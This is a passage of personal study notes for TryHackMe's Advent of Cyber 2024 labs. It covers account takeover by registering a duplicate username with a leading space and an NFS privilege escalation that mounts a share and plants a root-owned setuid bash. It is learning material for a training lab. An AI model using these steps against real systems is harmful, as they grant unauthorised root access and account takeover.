ntieu4328/TryHackMe/Advent of Cyber 2024.md

 * sometimes there's already user registered ex: (arthur)
 * can register user with space beforehand ex: ( arthur)
 * maybe gain access to arthur account

+NFS
+* allows system to share directories and files with others over a network
+* access files remotely by mounting file system on a server that can be accessed
+* use /usr/sbin/showmount -e (IP) - display information about NFS mounts on a system
+* mkdir /tmp/mount - creates temporary directory to mount share to
+* mount - make files and directories on file system accessible
+* exploitation ex:
+  * sudo mount -t nfs (IP):(mount) /tmp/mount/ -nolock
+  * cp ~/Downloads/bash - copy bash shell
+  * sudo chown root bash - become root user to run executable
+  * sudo chmod +s bash - gives permission for file to be executed with the privileges of file's owner READ UP ON FILE PERMISSION FORMAT AND MEANINGS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
+  * ssh ./bash -p - runs bash executible with the permissions

+SMTP:
+*

 XSS
 * Input code into text box